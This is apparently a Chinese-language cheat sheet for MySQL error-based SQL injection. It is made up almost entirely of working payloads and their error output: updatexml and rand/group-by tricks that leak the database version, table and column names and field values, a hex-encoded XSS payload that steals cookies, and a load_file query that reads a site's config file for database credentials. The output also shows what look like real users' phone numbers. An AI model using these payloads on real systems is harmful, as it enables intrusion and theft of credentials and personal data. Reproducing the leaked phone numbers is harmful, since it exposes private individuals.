mysql基于“报错”的注入

报错是如何转为xss的？

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79

mysql语句在页面报错，泄露信息 ========================================================================================================================================================================= *   报错方式之“updatexml”，有字数限制，但无需配合union。     -   mysql> select updatexml(1, concat(':', 'test'), 1);             ERROR 1105 (HY000): XPATH syntax error: ':test'     -   mysql> select updatexml(1, concat(0x3a, 'test'), 1);             ERROR 1105 (HY000): XPATH syntax error: ':test'     -   mysql> select updatexml(1, concat(0x5e, 'test'), 1);             ERROR 1105 (HY000): XPATH syntax error: '^test'     -   mysql>  select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, 'test'),1);             ERROR 1105 (HY000): XPATH syntax error: '^test'     **  将上面‘test’换成你的子查询语句或函数均可。   *   group by+rand(0)+having，无字数限制，无需配合union。     -   mysql>  select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);             ERROR 1062 (23000): Duplicate entry '5.6.21-log~1' for key 'group_key'     *   报错方式之“rand+count+group by”，需配合union     rand(0)无论在哪台机器运行多少次，生成的序列都是一样的     参考mysql开发者社区曝光的bug http://bugs.mysql.com/bug.php?id=8652     -   mysql>  select 1,2,count(*),concat('test', char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;             ERROR 1062 (23000): Duplicate entry 'test^1' for key 'group_key'     -   mysql>  select 1,2,count(*),concat('test', char(0x5e), left(rand(0),3))x from information_schema.tables group by x;             ERROR 1062 (23000): Duplicate entry 'test^0.7' for key 'group_key'     **  将上面‘test’换成你的子查询语句或函数均可。     mysql转xss语句     mysql>  select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;         ERROR 1062 (23000): Duplicate entry '/><img src="fuck" onerror=alert(document.cookie)>^0.7' for key 'group_key'   直接爆配置文件密码，前提是有file权限     mysql>   select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);         ERROR 1105 (HY000): XPATH syntax error: ':  'DB_NAME'   => 'fan******un','     mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);         ERROR 1105 (HY000): XPATH syntax error: ':  'DB_USER'   => 's*********b', /'     mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);         ERROR 1105 (HY000): XPATH syntax error: ':PWD'    => 'hahahaahhah','     爆版本     mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;         ERROR 1062 (23000): Duplicate entry '5.6.21-log1' for key 'group_key'   爆库名     mysql> select info();         ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist     mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;         ERROR 1062 (23000): Duplicate entry 'fangjiangjun^1' for key 'group_key'     爆表名     mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;         ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS^1' for key 'group_key'     mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;         ERROR 1062 (23000): Duplicate entry 'COLLATIONS^1' for key 'group_key'     mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;         ERROR 1062 (23000): Duplicate entry 'COLLATION_CHARACTER_SET_APPLICABILITY^1' for key 'group_key'       mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;         ERROR 1062 (23000): Duplicate entry 'f_admin^1' for key 'group_key'     mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;         ERROR 1062 (23000): Duplicate entry 'f_admin_role^1' for key 'group_key'   爆字段名     mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;         ERROR 1062 (23000): Duplicate entry 'id^1' for key 'group_key'     mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;         ERROR 1062 (23000): Duplicate entry 'login_time^1' for key 'group_key'     爆字段值     mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;         ERROR 1062 (23000): Duplicate entry '18602029479^1' for key 'group_key'     mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;         ERROR 1062 (23000): Duplicate entry '15602267509^1' for key 'group_key'